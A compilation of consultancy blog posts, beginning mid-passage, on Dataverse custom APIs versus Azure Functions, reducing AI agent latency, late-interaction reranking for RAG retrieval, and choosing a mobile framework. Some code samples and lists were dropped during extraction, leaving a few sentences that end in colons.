| Timeout | 2 minutes | 2 minutes | 10 minutes (Consumption), configurable higher |
| Cost | Included in Dataverse | Included in Dataverse | Per-execution + compute |
| Long-running work | No | No | Yes (durable functions) |
| External dependency calls | Limited (sandbox) | Limited (sandbox) | Full flexibility |
| OpenAPI schema | No | Yes | Manual |
| Invocable from flow | Yes | Yes (first-class) | Yes (HTTP connector) |
| Maintenance | .NET + Workflow | .NET | .NET (preferred) |

Custom Action is correct when you are maintaining an existing system that already uses them. For new work, skip them - custom APIs are the modern equivalent with better tooling.
Custom API is correct when:
Azure Function is correct when:
Custom APIs consume Dataverse capacity. A high-volume custom API (tens of thousands of calls per day) is paid for by your existing Dataverse licensing - no incremental per-call charge.
Azure Functions on Consumption plan: $0.000016 per GB-second and $0.20 per million executions. A typical custom function using 128 MB for 300 ms consumes 0.0375 GB-seconds, which is roughly $0.0000006 per call. A million calls per month is around $0.60 in compute plus $0.20 in executions - effectively free.
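
The Consumption-plan arithmetic can be worked directly from the two rates quoted above. This Python sketch uses only those rates plus the 128 MB / 300 ms example; the function name is hypothetical, and it ignores any monthly free grant and billing rounding.

```python
PRICE_PER_GB_SECOND = 0.000016        # Consumption rate quoted above
PRICE_PER_MILLION_EXECUTIONS = 0.20   # Consumption rate quoted above


def monthly_cost(calls: int, memory_mb: float = 128, duration_ms: float = 300) -> tuple[float, float]:
    """Return (compute_usd, executions_usd) for a month of calls."""
    # GB-seconds per call = memory in GB * duration in seconds.
    gb_seconds_per_call = (memory_mb / 1024) * (duration_ms / 1000)
    compute = calls * gb_seconds_per_call * PRICE_PER_GB_SECOND
    executions = calls / 1_000_000 * PRICE_PER_MILLION_EXECUTIONS
    return compute, executions


compute_usd, executions_usd = monthly_cost(1_000_000)
print(f"compute: ${compute_usd:.2f}, executions: ${executions_usd:.2f}")
```

Changing `memory_mb` or `duration_ms` shows how quickly a heavier function moves away from "effectively free".
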
The cost math usually favors custom API for Dataverse-heavy work and Azure Function for external-dependency-heavy work. Mixing the two via a custom API that calls a function (rare pattern) pays both bills.
Custom API gotcha: the plugin that implements a custom API registers against a synthetic "Custom API message" step. Debugging is via plugin trace logs, same as any plugin. Deployment is through the solution. The OpenAPI schema is auto-generated from the custom API row definitions, but parameter names are typed twice, once in Dataverse and once in the plugin code - a mismatch between the two produces a runtime failure that the solution checker does not catch.
Azure Function gotcha: cold start on Consumption plan can add 2-5 seconds for the first call after idle. For a user-facing interactive call, this is unacceptable. Options: Premium plan (always warm, higher baseline cost), Dedicated App Service plan, or accept the cold-start delay if the call is async.
Authentication gotcha for Azure Function: calling Dataverse from an Azure Function requires auth. The cleanest pattern is a managed identity on the Function App with an application user in Dataverse. Tutorials that use a user's personal credentials in app settings are security incidents waiting to happen.
Requirement: "Calculate and apply a loyalty rebate on every Order created."
Walking the matrix:
Custom API won clearly. Implementation was a plugin registered against a custom API definition, called from both a post-operation plugin on Order Create (synchronous, blocks save) and directly from a Power Automate flow (for retroactive recalculation).
A year later, the client wanted to integrate with an external tax service that takes 3-4 seconds per call. We did not put that in the same custom API - the 2-minute timeout plus the unpredictability of the external service made it fragile. We built a separate Azure Function for the tax call, invoked async from a Power Automate flow. Two tools for two different latency profiles, as it should be.
If the operation stays inside Dataverse, start with a custom API. You get low latency, integrated ALM, and zero incremental cost. You can always move it to an Azure Function later if the requirements shift.
If the operation has any external dependency with unpredictable behavior, start with an Azure Function. You get the durability patterns and the 10-minute timeout that the Dataverse sandbox cannot give.
If you find yourself using custom actions for new work, stop. Custom APIs have everything custom actions did plus a schema and better tooling.

---
## Cutting agent latency from 30s to 8s without model swap

> Published: 2026-05-24 02:52:03+00:00
> Source: https://dev.to/sapotacorp/cutting-agent-latency-from-30s-to-8s-without-model-swap-256j
> wpnews: https://wpnews.pro/news/cutting-agent-latency-from-30s-to-8s-without-model-swap

The article describes how a team reduced their AI agent's p95 response latency from 31 seconds to 8 seconds and cut user abandonment by 70% without changing the underlying model. The improvements came from four structural changes: making independent tool calls concurrent (saving 3.3 seconds), removing an unnecessary critic LLM step (saving 3 seconds), implementing streaming to improve perceived latency, and caching repeated lookups. The key insight is that the model itself accounted for only 35% of the total latency, while the remaining 65% came from sequential tool calls, redundant LLM steps, and missing streaming.

A founder pinged us with a UX problem disguised as an engineering question. His team had launched an AI chat product. Users were abandoning the conversation before the agent finished responding. The team had measured p95 response latency at 31 seconds. Their assumption was that they needed to switch to a faster model.
The actual model was responsible for about 35% of the total latency. The other 65% was sequential tool calls, unnecessary intermediate LLM steps, and a missing streaming layer. Switching to a smaller model would have cut maybe 5 seconds off the worst case while degrading response quality.
We made four changes that did not touch the model. P95 latency dropped from 31 seconds to 8 seconds. User abandonment rate dropped 70%. The model stayed the same.
This is the latency stack that most teams either do not measure or do not know how to optimize. Here is the pattern.
Before any optimization, instrument the agent and trace where time is spent. The breakdown for a typical multi-step agent looks something like:
The LLM call portion is hard to optimize without changing the model. The other 50-70% is where most of the win is, and most teams do not look there because the LLM feels like the obvious bottleneck.
The founder's agent had:
Total p95 was 31 seconds. The model was responsible for 11 seconds of that. The other 20 seconds were structural.
The biggest win in most agent systems is making tool calls concurrent.
The founder's agent had a step where it needed to look up the user's account information, the customer's order history, and the related support tickets. The original code did this sequentially:
Total: 5.3 seconds, all wait time.
The fix was async-await with parallel dispatch:
That single change saved 3.3 seconds per request. The actual code change was 8 lines.
The pattern: any time the agent calls multiple tools and the results are independent, those tool calls can run concurrently. Use asyncio.gather in Python, Promise.all in JavaScript. Modern agent frameworks (LangGraph, CrewAI Flows) support this natively.
Audit your agent for serial tool calls that could run in parallel. There is almost always one or two.
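A minimal sketch of the parallel dispatch described above, using `asyncio.gather`. The three tool functions and their return values are hypothetical stand-ins (with `asyncio.sleep` simulating network wait), not the founder's actual code.

```python
import asyncio


# Hypothetical tool calls. asyncio.sleep stands in for network wait time.
async def get_account(user_id: str) -> dict:
    await asyncio.sleep(0.05)
    return {"user_id": user_id, "plan": "pro"}


async def get_order_history(user_id: str) -> list:
    await asyncio.sleep(0.05)
    return [{"order_id": "o-1", "status": "shipped"}]


async def get_support_tickets(user_id: str) -> list:
    await asyncio.sleep(0.05)
    return []


async def load_context(user_id: str) -> dict:
    # The three lookups do not depend on each other, so dispatch them together.
    # gather returns results in the order the awaitables were passed in.
    account, orders, tickets = await asyncio.gather(
        get_account(user_id),
        get_order_history(user_id),
        get_support_tickets(user_id),
    )
    return {"account": account, "orders": orders, "tickets": tickets}


context = asyncio.run(load_context("u-1"))
```

With concurrent dispatch the wall-clock time approaches that of the slowest single call rather than the sum of all three, which is where the saving comes from.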
The original agent had a planner LLM that generated a plan, then a separate critic LLM that reviewed the plan, then the executor.
The critic was rejecting roughly 8% of plans, which meant 92% of the time it was an extra LLM call (3 seconds) for nothing. And of the 8% it rejected, the planner produced a similar plan on the next iteration anyway, suggesting the critic was not adding much real value.
We removed the critic, kept the planner, and added validation rules instead (does the plan reference real tools, does it have any cycles, does it stay under the step limit). The validation runs in milliseconds, not seconds, and catches the same class of bad plans the critic was catching.
3 seconds saved per request, on average. Measured quality was no different on the eval set.
The pattern: every LLM call in the chain should be earning its keep. If a step rejects only a small fraction of inputs and the alternative is a deterministic check, the deterministic check is faster and usually as good.
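The three validation rules mentioned above (real tools, no cycles, step limit) could look roughly like the sketch below. The plan shape (`Step` with `id`, `tool`, `depends_on`), the tool names, and the limit of 8 steps are all assumptions made for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class Step:
    id: str
    tool: str
    depends_on: list = field(default_factory=list)


# Hypothetical tool registry and step limit.
KNOWN_TOOLS = {"lookup_account", "order_history", "support_tickets"}
MAX_STEPS = 8


def validate_plan(steps: list) -> list:
    """Return a list of human-readable problems; an empty list means the plan passes."""
    errors = []
    if len(steps) > MAX_STEPS:
        errors.append(f"plan has {len(steps)} steps, limit is {MAX_STEPS}")

    ids = {s.id for s in steps}
    for s in steps:
        if s.tool not in KNOWN_TOOLS:
            errors.append(f"step {s.id}: unknown tool {s.tool!r}")
        for dep in s.depends_on:
            if dep not in ids:
                errors.append(f"step {s.id}: unknown dependency {dep!r}")

    # Kahn's algorithm: if some steps can never be scheduled, there is a cycle.
    deps = {s.id: set(s.depends_on) & ids for s in steps}
    indegree = {sid: len(d) for sid, d in deps.items()}
    ready = [sid for sid, n in indegree.items() if n == 0]
    scheduled = 0
    while ready:
        current = ready.pop()
        scheduled += 1
        for sid, d in deps.items():
            if current in d:
                indegree[sid] -= 1
                if indegree[sid] == 0:
                    ready.append(sid)
    if scheduled < len(indegree):
        errors.append("plan contains a dependency cycle")
    return errors


good_plan = [Step("a", "lookup_account"), Step("b", "order_history", ["a"])]
cyclic_plan = [Step("a", "lookup_account", ["b"]), Step("b", "order_history", ["a"])]
bad_tool_plan = [Step("a", "delete_database")]
```

Checks like these run in well under a millisecond for plans of this size, so they add nothing measurable to request latency.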
The original agent waited for the full response to be generated before returning anything to the user. The user saw a loading spinner for 31 seconds, then the full response appeared.
Streaming changes the perceived latency dramatically. The user starts seeing tokens within 1-2 seconds, even if the full response takes 8. The agent is not actually faster, but the UX feels faster, and abandonment rate drops because users get visible feedback.
The implementation is a few lines of code. The OpenAI and Anthropic APIs both support streaming natively. The frontend needs to handle server-sent events (SSE) or websockets. The user experience improvement is large and immediate.
For multi-step agents, you can also stream intermediate progress: "Looking up your account... Checking order history... Generating response..." This is qualitatively different from a spinner. Users will wait 8 seconds for visible progress; they will not wait 8 seconds for a spinner.
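One way to sketch the progress-plus-tokens stream is an async generator whose events are framed as server-sent events. The `run_agent` generator and its hard-coded tokens are hypothetical; a real agent would yield status events around actual tool calls and forward tokens from the model's streaming API.

```python
import asyncio
from typing import AsyncIterator


async def run_agent(question: str) -> AsyncIterator[str]:
    # Status events give the user visible progress while tools run.
    yield "status: Looking up your account..."
    await asyncio.sleep(0)  # placeholder for the real tool call
    yield "status: Checking order history..."
    await asyncio.sleep(0)  # placeholder for the real tool call
    yield "status: Generating response..."
    # Placeholder tokens; a real agent would relay the model's stream here.
    for token in ["Your ", "order ", "shipped."]:
        yield f"token: {token}"


def to_sse(event: str) -> str:
    """Frame one 'kind: data' event in the server-sent events wire format."""
    kind, _, data = event.partition(": ")
    return f"event: {kind}\ndata: {data}\n\n"


async def collect(question: str) -> list:
    return [to_sse(event) async for event in run_agent(question)]


frames = asyncio.run(collect("Where is my order?"))
```

In a web handler the frames would be written to the response as they are produced rather than collected into a list; the list here only makes the output easy to inspect.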
Some queries repeat. Some intermediate steps repeat across queries. Both are cacheable.
The founder's agent had a "policy lookup" tool that retrieved from a small KB of company policies. The policies changed maybe once a month. The agent was hitting the KB and running a vector search every time. We added a simple in-memory cache with a 5-minute TTL. The cache hit rate was 35%, saving 0.8 seconds per cached request.
Semantic caching is the more advanced version: cache LLM responses keyed on the embedding of the query. If a new query is semantically similar to a recent one, return the cached response. We use this carefully (only for queries with high confidence and low staleness risk), but it can save 5+ seconds on cache hits.
Aggressive caching: every tool call and every LLM call should be evaluated for cacheability. Most are. Most teams do not bother. The latency improvement compounds.
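The policy-lookup cache described above can be sketched as a small in-memory store with a time-to-live. The `TTLCache` class and the `policy_lookup` function are hypothetical; the injectable clock exists only so that expiry can be demonstrated without waiting five minutes.

```python
import time
from typing import Any, Callable


class TTLCache:
    """Tiny in-memory cache whose entries expire after ttl_seconds."""

    def __init__(self, ttl_seconds: float, clock: Callable[[], float] = time.monotonic):
        self._ttl = ttl_seconds
        self._clock = clock
        self._entries = {}  # key -> (expires_at, value)
        self.hits = 0
        self.misses = 0

    def get_or_compute(self, key: str, compute: Callable[[], Any]) -> Any:
        now = self._clock()
        entry = self._entries.get(key)
        if entry is not None and entry[0] > now:
            self.hits += 1
            return entry[1]
        # Missing or expired: run the slow lookup and remember the result.
        self.misses += 1
        value = compute()
        self._entries[key] = (now + self._ttl, value)
        return value


lookups = []


def policy_lookup(topic: str) -> str:
    # Stand-in for the KB vector search.
    lookups.append(topic)
    return f"policy text for {topic}"


fake_now = [0.0]
cache = TTLCache(ttl_seconds=300, clock=lambda: fake_now[0])

first = cache.get_or_compute("refunds", lambda: policy_lookup("refunds"))
second = cache.get_or_compute("refunds", lambda: policy_lookup("refunds"))  # served from cache
fake_now[0] = 301.0  # move past the 5-minute TTL
third = cache.get_or_compute("refunds", lambda: policy_lookup("refunds"))  # recomputed
```

Tracking hits and misses alongside the cache makes it easy to report a hit rate like the 35% quoted above.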
After all four changes:
User abandonment rate dropped 70% in the first two weeks. Customer satisfaction scores went up. The model and the agent's core logic did not change.
The team's original instinct (switch to a smaller model) would have saved maybe 5 seconds while degrading quality. The structural changes saved 23 seconds while keeping quality the same.
Before approving "switch to a faster model" as the latency fix, walk through:
Most agent systems have 50-70% latency improvement available without touching the primary model. Audit before you swap.
Switching to a smaller, faster model can be the right call for some agents. But it is the last resort, not the first. The cost is response quality, and that cost is permanent. The structural improvements are free.
The pattern Sapota recommends: optimize the structure first, measure the new latency, then decide whether a model swap is still needed. Often it is not. When it is, you have a much smaller gap to close, and the trade-off is more justified.
If your team has launched an AI agent and users are abandoning conversations before the response arrives, the issue is rarely the model. It is usually the structure.
Sapota offers a one-week latency audit that traces your agent's actual time spent, identifies the parallelizable tool calls, the removable LLM steps, and the missing caching opportunities, and ships the optimizations as working code. We have done this for chat products, customer support tools, and research assistants. The typical improvement is 60-75% latency reduction without changing the model.
Reach out via the AI engineering page with your current p95 latency and a sample trace if you have one. If you do not have traces, we will install observability first and audit second.

---
## When recall plateaus: the late-interaction technique most teams skip

> Published: 2026-05-24 02:51:57+00:00
> Source: https://dev.to/sapotacorp/when-recall-plateaus-the-late-interaction-technique-most-teams-skip-54o4
> wpnews: https://wpnews.pro/news/when-recall-plateaus-the-late-interaction-technique-most-teams-skip

The article explains that many teams hit a recall ceiling with RAG systems because they rely on bi-encoder embedding models, which compress entire text chunks into a single vector and lose fine-grained detail. The solution is to use late-interaction techniques like ColBERT, which preserve per-token embeddings and compute relevance through maximum similarity scoring, often boosting recall from 58% to 81% in a single afternoon. The article also describes two deployment patterns for ColBERT—as a reranker over bi-encoder results or as the primary retriever—and notes that ColPali extends this approach to image-based document pages.

A founder we work with had been stuck on the same problem for two months. Their RAG retrieval recall was sitting at 58%. They had tried OpenAI's text-embedding-3-small, then text-embedding-3-large, then BGE-M3, then Voyage. Each swap added a couple of points, then the curve flattened. The team was about to start fine-tuning their own embedding model.
We told them to stop and add a reranker first. The number went from 58% to 81% in a single afternoon. The fine-tuning project was cancelled.
This is the moment most teams discover that the bottleneck was never the embedding model. It was the architecture choice of using a single embedding per chunk to begin with. Late interaction is the family of techniques that fixes it, and it is the one most teams skip because the name sounds intimidating.
A bi-encoder (which is what every standard embedding model is) takes a chunk of text, compresses it into a single fixed-length vector, and stores it. At query time, the user's question is also compressed into a single vector, and similarity is computed between the two.
The compression is the problem. A 500-token chunk that mentions five different concepts gets averaged into one vector. The vector represents the chunk roughly, but it loses the distinction between "this chunk is mostly about X with a brief mention of Y" and "this chunk is mostly about Y with a brief mention of X." When the user query is about Y, both chunks look equally relevant by cosine distance, even though one is the right answer and the other is noise.
This is why every benchmark of "best embedding model" shows diminishing returns past a certain point. The embedding model is doing the best it can with the information bottleneck of a single vector. The architecture is the limit.
ColBERT (the original, 2020) keeps the per-token embeddings instead of pooling them into one vector. A 500-token chunk becomes 500 vectors. A 10-token query becomes 10 vectors. At scoring time, you compute the maximum similarity between each query token and any chunk token, then sum those max scores into the final relevance score.
The math is the same dot products you would do for any vector search. The difference is that "how well does this query match this chunk" is now a sum of "for each query token, what is the best matching chunk token," which preserves the fine-grained signal that pooling threw away.
In practice this looks like:
This is what catches the recall ceiling.
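The MaxSim scoring rule can be written in a few lines. This is a pure-Python sketch over toy 2-dimensional vectors chosen for illustration; it assumes cosine similarity between token vectors, and a real system would use a vectorised library and learned embeddings.

```python
import math


def cosine(a: list, b: list) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.hypot(*a) * math.hypot(*b))


def maxsim_score(query_tokens: list, chunk_tokens: list) -> float:
    # For each query token, take its best match among the chunk's tokens,
    # then sum those per-token maxima into one relevance score.
    return sum(
        max(cosine(q, c) for c in chunk_tokens)
        for q in query_tokens
    )


# Toy token embeddings (hypothetical values).
query = [[1.0, 0.0], [0.0, 1.0]]
chunk_a = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]]  # has a strong match for both query tokens
chunk_b = [[1.0, 0.0], [1.0, 0.1]]              # only matches the first query token well

score_a = maxsim_score(query, chunk_a)
score_b = maxsim_score(query, chunk_b)
```

Because each query token is scored against its own best match, a chunk that covers every part of the query outranks one that covers only part of it.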
Sapota uses ColBERT in two patterns depending on the corpus size and latency budget.
Pattern 1: ColBERT as a reranker over bi-encoder retrieval. The first stage is a standard bi-encoder vector search returning the top 50 candidates. The second stage is ColBERT reranking those 50 down to the top 5. This is the pattern we use for most production deployments. The first stage is fast (millisecond range, scales to billions of vectors). The second stage is slow but only runs on 50 candidates, not the full index.
Pattern 2: ColBERT as the only retriever. For corpora under a few million chunks, ColBERT can be the primary retriever using PLAID or similar index structures that make late-interaction search tractable at scale. Latency is higher than a bi-encoder (10x to 50x depending on index size), but recall is the highest of any retrieval method we have benchmarked.
We default to Pattern 1 unless the corpus is small enough that Pattern 2 is feasible and the recall lift justifies it.
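Pattern 1 can be sketched as two sorts: a cheap single-vector pass over the whole corpus, then a late-interaction pass over the short list. Everything here is a toy assumption: mean pooling stands in for a real bi-encoder, the corpus is four hand-written chunks, and a production first stage would use an approximate nearest-neighbour index rather than a full sort.

```python
import math


def cosine(a: list, b: list) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.hypot(*a) * math.hypot(*b))


def mean_pool(tokens: list) -> list:
    # Collapse per-token vectors into one vector, as a bi-encoder effectively does.
    return [sum(column) / len(tokens) for column in zip(*tokens)]


def maxsim(query_tokens: list, chunk_tokens: list) -> float:
    return sum(max(cosine(q, c) for c in chunk_tokens) for q in query_tokens)


def retrieve(query_tokens: list, corpus: dict, first_stage_k: int = 50, final_k: int = 5) -> list:
    query_vec = mean_pool(query_tokens)
    # Stage 1: single-vector similarity over every chunk, keep the top candidates.
    candidates = sorted(
        corpus,
        key=lambda cid: cosine(query_vec, mean_pool(corpus[cid])),
        reverse=True,
    )[:first_stage_k]
    # Stage 2: late-interaction rerank, run only on the short list.
    reranked = sorted(
        candidates,
        key=lambda cid: maxsim(query_tokens, corpus[cid]),
        reverse=True,
    )
    return reranked[:final_k]


# Toy corpus of per-token embeddings keyed by chunk id (hypothetical values).
corpus = {
    "a": [[1.0, 0.0], [0.0, 1.0]],
    "b": [[1.0, 0.0], [1.0, 0.0]],
    "c": [[0.0, 1.0], [0.0, 1.0]],
    "d": [[-1.0, 0.0], [0.0, -1.0]],
}
query = [[1.0, 0.0], [0.0, 1.0]]

top = retrieve(query, corpus, first_stage_k=3, final_k=1)
```

The expensive scoring function only ever sees `first_stage_k` chunks, which is what keeps the second stage affordable as the index grows.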
ColPali extends the late-interaction idea to entire document pages treated as images. Instead of token-level embeddings of text, it uses patch-level embeddings of an image of the page (each page split into a 32x32 grid of patches). Query tokens match against image patches using the same MaxSim mechanism.
The implications:
The cost is storage (1024 vectors per page vs 1 vector per chunk) and indexing speed (vision encoder inference is GPU-bound). Binary quantization brings the storage cost down by 32x and the latency down by an order of magnitude, which is what makes ColPali production-viable.
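The 32x figure follows from replacing each 32-bit float with a single sign bit. The sketch below works the per-page storage numbers and shows sign-based binarisation with a Hamming-style similarity; the embedding width of 128 dimensions and float32 storage are assumptions for illustration, not figures from the text.

```python
PATCHES_PER_PAGE = 32 * 32   # the 32x32 grid described above
DIM = 128                    # assumed embedding width per patch
BYTES_PER_FLOAT32 = 4

float_bytes_per_page = PATCHES_PER_PAGE * DIM * BYTES_PER_FLOAT32
binary_bytes_per_page = PATCHES_PER_PAGE * DIM // 8   # one bit per dimension
compression_ratio = float_bytes_per_page / binary_bytes_per_page


def binarize(vec: list) -> int:
    """Pack the sign of each dimension into one integer, first dimension as the high bit."""
    bits = 0
    for value in vec:
        bits = (bits << 1) | (1 if value > 0 else 0)
    return bits


def hamming_similarity(a: int, b: int, dim: int) -> int:
    """Number of dimensions on which two binarised vectors agree."""
    return dim - bin(a ^ b).count("1")


code_a = binarize([0.3, -0.2, 0.9, -0.1])   # signs + - + -
code_b = binarize([0.5, -0.7, -0.4, -0.2])  # signs + - - -
agreement = hamming_similarity(code_a, code_b, dim=4)
```

Comparing packed bit codes with XOR and a population count is far cheaper than float dot products, which is consistent with the latency reduction mentioned above.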
For document-heavy corpora (research papers, financial filings, slide decks, regulatory submissions), ColPali outperforms both bi-encoder text RAG and CLIP-based multimodal RAG on published benchmarks. We use it when the corpus is genuinely visual and the budget supports the storage and GPU inference cost.
Late interaction is not free. The honest trade-off:
The number to weigh against this is the recall lift. In every audit Sapota has run where the team's recall plateaued in the 50% to 70% range, adding late-interaction reranking pushed it into the 80% to 90% range. That delta is the difference between "the AI is unreliable" and "the AI is the best search interface we have."
A reranker is not always the answer. Skip it when:
For most production RAG systems sitting at recall in the 60% to 75% range, late interaction is the next move. Cross-encoder rerankers are the lighter alternative if the team is not ready for the full ColBERT setup.
The fix took half a day. We added a Jina-reranker stage between their existing Qdrant retrieval and the LLM call. Recall jumped from 58% to 81%. Faithfulness (because the LLM was now seeing better context) went from 0.79 to 0.93. The fine-tuning project was cancelled the same week.
The next conversation is whether to upgrade the cross-encoder to a full ColBERT setup, which would push recall another 4 to 6 points based on what we have seen on similar corpora. For their current scale and budget, the cross-encoder is the right floor. Full ColBERT is the v2.
If your team has been swapping embedding models and watching the recall curve flatten, the bottleneck is almost certainly the architecture, not the model. Sapota runs a one-week reranker integration engagement that adds the cross-encoder or ColBERT stage as a working PR plus a side-by-side eval against the current setup.
Reach out via the AI engineering page with the recall numbers you are seeing and the embedding models you have already tried. The diagnosis is usually the same conversation.

---
## Mobile stack decision: FlutterFlow vs React Native vs Flutter

> Published: 2026-05-24 02:51:51+00:00
> Source: https://dev.to/sapotacorp/mobile-stack-decision-flutterflow-vs-react-native-vs-flutter-18h8
> wpnews: https://wpnews.pro/news/mobile-stack-decision-flutterflow-vs-react-native-vs-flutter

This article explains that there is no single "best" mobile framework; instead, the choice between FlutterFlow, React Native (with Expo), and Flutter depends on a project's specific constraints like timeline, team, and design needs. FlutterFlow is highlighted as the fastest path to an MVP for standard UI patterns, while React Native offers the largest ecosystem and OTA updates, and Flutter provides the most runtime control. The article warns that picking the wrong framework can cost 2 to 4 months of rework after eighteen months.

A founder asked us last month which mobile framework was "the best." We get the question often enough that we have a rehearsed answer: none of them is best. Each fits a specific set of constraints, and picking the wrong one for your specific situation usually costs 2 to 4 months of rework eighteen months in.
The framework matters less than the fit. The fit depends on your timeline, your team, your design fidelity needs, and whether you are optimizing for the next twelve weeks or the next five years. Here is the decision framework Sapota walks every founder through.
The three options on the table
For most B2C and B2B mobile products in 2026, the realistic shortlist is FlutterFlow, React Native (with Expo), or Flutter native (writing Dart directly). Native iOS / Android (Swift, Kotlin) is still the right call for some specific cases, but it is rarely the default anymore. We will cover when native does win at the end.
The three frameworks differ on three dimensions that matter most: development speed, runtime control, and team future-proofing.
FlutterFlow
A visual development tool built on top of Flutter. You design screens by dragging components, configure data sources visually, and FlutterFlow generates Dart code under the hood. Custom logic drops into Dart custom actions and custom widgets when the visual editor cannot express what you need.
Strengths:
- Fastest path to a shippable MVP. 12-week marketplace MVPs are realistic for a 3-engineer team.
- Pixel-perfect design implementation. Figma to FlutterFlow is closer to one-to-one than any other framework we have used.
- Theming and white-label setup are first-class concepts. Multi-tenant apps with brand variables ship in days, not weeks.
- The founder can open the editor and request changes that you implement in minutes. Tightest design-to-development feedback loop in the industry.
Where it pushes back:
- Anything custom-rendered (canvas drawing, complex animations, game-like UI) needs Dart custom widgets, which pulls you out of the visual flow.
- State management at scale (3+ user roles, multi-tenant theming, real-time updates) outgrows app-state primitives. You end up moving state to the backend and treating the app as a thin client.
- Performance profiling is shallow. No equivalent to React Native's Flipper or Flutter's DevTools. You debug performance through guesswork.
- Vendor lock-in is real. Migrating off FlutterFlow means rebuilding in Flutter or another framework, not exporting and continuing.
Pick FlutterFlow when:
- MVP timeline is under 16 weeks
- 80%+ of screens are standard mobile UI patterns (auth, lists, details, forms)
- Backend is decoupled (Supabase, Firebase, custom API)
- Your team accepts that custom Dart will be needed for the bespoke 20%
- Visual fidelity matters and you want predictable results across iOS and Android
Skip FlutterFlow when:
- The product needs heavy real-time interactivity (multiplayer games, collaborative drawing, live markets)
- Your engineering team will need to maintain the app for 5+ years and you want them comfortable with the underlying framework directly
- You already have a strong React Native or Flutter team; the framework switch cost is higher than the visual development savings
React Native (with Expo)
Facebook's framework for building native mobile apps using JavaScript and React. With Expo's tooling (EAS Build, EAS Update, OTA patches), you get a managed workflow that handles a lot of native build complexity automatically.
Strengths:
- Largest ecosystem of any cross-platform framework. Almost any native API has a JavaScript wrapper. Stuck on something? There is an npm package or a community fix.
- JavaScript / TypeScript familiarity. Your web team can ramp on mobile faster than learning Dart or Swift.
- OTA updates via Expo. Push bug fixes without going through App Store review. For early-stage products iterating weekly, this is significant.
- Mature debugging tools (Flipper, React DevTools, native debuggers).
- Best long-term hire-ability. JavaScript engineers are everywhere.
Where it pushes back:
- Performance ceiling lower than Flutter or native for graphics-heavy or animation-heavy apps. The JavaScript bridge is faster than it used to be (with Hermes and the new architecture) but still not native.
- Native module compatibility issues when you upgrade React Native. Major upgrades are rarely smooth. We budget 2-4 weeks for upgrades on production apps.
- Visual fidelity work is more iterative than FlutterFlow. Designs render close but you spend more time on platform-specific edge cases (Android shadows, iOS safe areas, font rendering).
- Easy to ship a slow app accidentally. The framework forgives sloppy patterns until production load reveals them.
Pick React Native when:
- Your team has strong JavaScript / TypeScript background
- The product needs OTA update capability (frequent iteration without store review)
- You want hire-ability and ecosystem maturity over raw performance
- The app is content-heavy or transactional (most B2B SaaS, content apps, e-commerce)
- You expect 3+ years of active development with team turnover
Skip React Native when:
- The app is graphics or animation-heavy
- You need consistent 60+ fps under load
- Your team has no JavaScript expertise and you would be teaching from scratch
- The product is highly platform-specific (deep iOS-only or Android-only integrations)
Flutter native
Writing Dart directly against Flutter's framework, no visual builder. Same underlying technology as FlutterFlow but with full control over every line of code.
Strengths:
- Best performance of the three options. Compiles to native code, no JavaScript bridge, predictable 60+ fps even with complex UI.
- Single codebase compiles to iOS, Android, web, desktop. The most truly cross-platform option of the three.
- Beautiful animation framework. If your app's differentiator is motion design or visual polish, Flutter native gives you the most expressive primitives.
- Strong typing with Dart catches more bugs at compile time than JavaScript.
- DevTools profiler is excellent. Performance debugging is straightforward.
Where it pushes back:
- Slower to ship MVP than FlutterFlow. You write every screen by hand. For an MVP that FlutterFlow ships in 12 weeks, Flutter native usually takes 16-20.
- Smaller ecosystem than React Native. Most native APIs have Flutter packages, but the long tail is smaller. You will write more native plugins yourself.
- Hire-ability is improving but still behind JavaScript. Senior Flutter engineers in 2026 are easier to find than in 2022 but still command a premium.
- Dart is a mid-popularity language. Comfortable for most engineers within a few weeks but not a transferable skill outside Flutter.
Pick Flutter native when:
- Performance requirements are strict (60+ fps under all load conditions)
- The app's design includes complex animations or motion as a differentiator
- You want one codebase across iOS, Android, web, and possibly desktop
- The team is already Flutter-fluent or willing to invest in becoming so
- Long-term ownership of the codebase matters more than fastest-possible MVP
Skip Flutter native when:
- Your timeline is under 16 weeks for v1
- You have no Flutter or Dart experience and the team's bandwidth to ramp up is limited
- The product is mostly standard CRUD screens (FlutterFlow ships these faster)
- You need OTA updates as a core capability (Flutter has this, but the ecosystem is less mature than Expo's)
When native (Swift, Kotlin) still wins
We bring up native iOS / Android less often than we used to, but it has not disappeared. The cases where we still recommend native:
- Heavy platform-specific integrations: Apple Pay deep integration, ARKit / RealityKit, Watch app, CarPlay, App Clips, Live Activities. Same on Android: deep Auto, Wear OS, advanced camera features. Cross-platform frameworks reach these eventually but always with delay.
- Performance-critical apps with platform-specific optimization: heavy image processing, on-device ML, AR / VR. Native gives you direct access to Metal, Core ML, ARKit without bridge overhead.
- Apps where the team is already native and the cross-platform switch costs more than maintaining two codebases: rare but real. A team that has shipped 5 years of Swift will lose more by switching than by writing two apps.
- Projects where the App Store review process is hostile to cross-platform (some categories of apps face stricter review when they look or behave non-native).
For most B2C and B2B SaaS products in 2026, native is overkill. The cross-platform frameworks have closed the gap on 95% of use cases.
The decision matrix
Eight criteria, four options each.
MVP speed (how fast you can ship v1):
- FlutterFlow: Fastest
- React Native: Fast
- Flutter native: Medium
- Native (Swift/Kotlin): Slowest
Performance ceiling (frame rate under load):
- FlutterFlow: Medium
- React Native: Medium
- Flutter native: High
- Native: Highest
Hire-ability in 2026 (how easy to find engineers):
- FlutterFlow: Niche
- React Native: High
- Flutter native: Medium
- Native: High per platform (Swift or Kotlin separately)
OTA updates (ship fixes without store review):
- FlutterFlow: Yes via FlutterFlow Cloud
- React Native: Yes via Expo
- Flutter native: Limited
- Native: Not supported
Long-term codebase health (5+ year ownership):
- FlutterFlow: Risky, vendor lock-in
- React Native: Stable
- Flutter native: Stable
- Native: Stable
White-label / multi-tenant theming:
- FlutterFlow: Native first-class concept
- React Native: Doable with effort
- Flutter native: Doable with effort
- Native: Doable with effort
Custom animations (motion-heavy products):
- FlutterFlow: Limited
- React Native: Medium
- Flutter native: Strongest
- Native: Strongest per platform
Visual fidelity to Figma:
- FlutterFlow: Highest
- React Native: Medium-High
- Flutter native: High
- Native: Highest per platform
How Sapota approaches the choice
The mistake we see most often is teams picking a framework based on what their current developers happen to know, then spending the next two years working around its limitations. The framework should fit the product, not the team's existing comfort zone.
